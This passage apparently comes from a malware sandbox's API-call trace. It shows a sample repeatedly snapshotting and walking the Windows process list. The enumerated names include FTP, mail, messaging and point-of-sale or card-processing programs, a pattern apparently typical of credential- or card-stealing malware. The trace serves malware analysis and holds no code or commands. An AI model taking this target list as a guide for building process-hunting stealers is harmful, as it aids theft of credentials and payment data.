lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.181] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0206.184] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0206.186] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0206.195] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0206.197] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0206.200] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0206.203] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0206.205] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0206.208] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0206.210] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0206.213] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0206.215] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0206.217] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0206.219] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0206.221] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0206.223] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0206.225] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0206.227] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0206.231] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0206.233] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0206.235] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0206.238] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0206.241] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0206.246] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0206.249] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0206.253] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0206.256] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0206.260] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0206.263] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0206.266] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0206.275] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0206.279] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0206.284] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0206.288] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0206.291] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0206.294] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0206.298] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0206.301] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0206.304] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0206.307] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0206.309] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0206.315] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0206.318] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0206.320] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0206.322] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0206.325] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0206.328] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0206.331] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0206.333] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0206.336] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0206.339] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0206.341] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0206.344] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0206.347] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0206.351] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0206.354] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0206.357] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0206.360] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0206.362] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0206.365] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0206.368] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0206.370] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.373] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0206.376] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.378] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.381] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0206.384] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0206.400] CloseHandle (hObject=0x20fc) returned 1 [0206.400] Sleep (dwMilliseconds=0x64) [0206.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20fc [0206.518] Process32First (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.520] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.522] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.525] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.528] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.530] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.534] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.536] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.538] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.540] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.547] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.549] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.551] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.558] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.560] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.562] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.564] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 